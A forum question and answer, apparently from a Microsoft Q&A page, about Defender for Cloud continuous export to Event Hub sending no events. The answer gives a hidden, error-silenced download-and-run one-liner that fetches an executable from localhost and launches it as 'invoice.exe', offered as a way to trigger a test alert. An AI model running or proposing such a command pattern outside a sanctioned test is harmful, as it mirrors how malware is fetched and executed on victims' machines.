azureazure-securityazure-defenderazure-security-center

Defender for Cloud - continuous export to Event Hub uneventful

Has anyone been able to successfully send events to an Event Hub for Defender for Cloud?: https://learn.microsoft.com/en-us/azure/defender-for-cloud/continuous-export#set-up-continuous-export-in-the-azure-portal-1

I've configured this days ago, but i have yet to receive a single event (i am monitoring my Event Hub ingress). I ticked all boxes for events to receive, in a streaming fashion ("Streaming updates" tickbox). It is my test tenant, and I am Owner on everything, everything saves and configures just fine, i cannot find any errors.

I didn't tick "Export as a trusted service" because i don't need that extra security measure, my Event Hub isn't behind a firewall.

To generate security alerts (one of the events that should be exported) I made use of the sample alert functionality: https://learn.microsoft.com/en-us/azure/defender-for-cloud/alert-validation#generate-sample-security-alerts - I generated those after I configured the continuous export to Event Hub.

I also created a Function App with TLS 1.0, after setting up the export. This should yield a recommendation which also should be exported. I am aware that, for recommendations, it can take day(s) to receive events, as stated here: https://learn.microsoft.com/en-us/azure/defender-for-cloud/faq-general#why-are-recommendations-sent-at-different-intervals-. But it should not be the case for security alerts.

Solution

  • I was able to reproduce your scenario. From my what I can deduce, the sample alerts do not stream into Event Hub. I will look into why this is thee case. However, to test this, I recommend that you trigger an actual alert from your machine.

    1. will need to create a folder in Location C: named C:\test-MDATP-test\invoice.exe

    2. Launch cmd as administrator and execute the below

      Then execute WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\test-MDATP-test\invoice.exe');Start-Process 'C:\test-MDATP-test\invoice.exe'

    3. The cmd screen will disapper and an alert will be created on MDC and streamed to Event Hub

    Note: If you have MDE you’ll need to ensure that the connection between MDE and MDC is properly set up:

    Ensure Endpoint protection is set to on (Not Partial) under MDS – You can find this under Home> Microsoft Defender for Cloud > Environment settings >You Subscription>Defender Plans> Servers > Settings > Endpoint Protection

    Source: https://learn.microsoft.com/en-gb/azure/defender-for-cloud/alert-validation#simulate-alerts-on-your-azure-vms-windows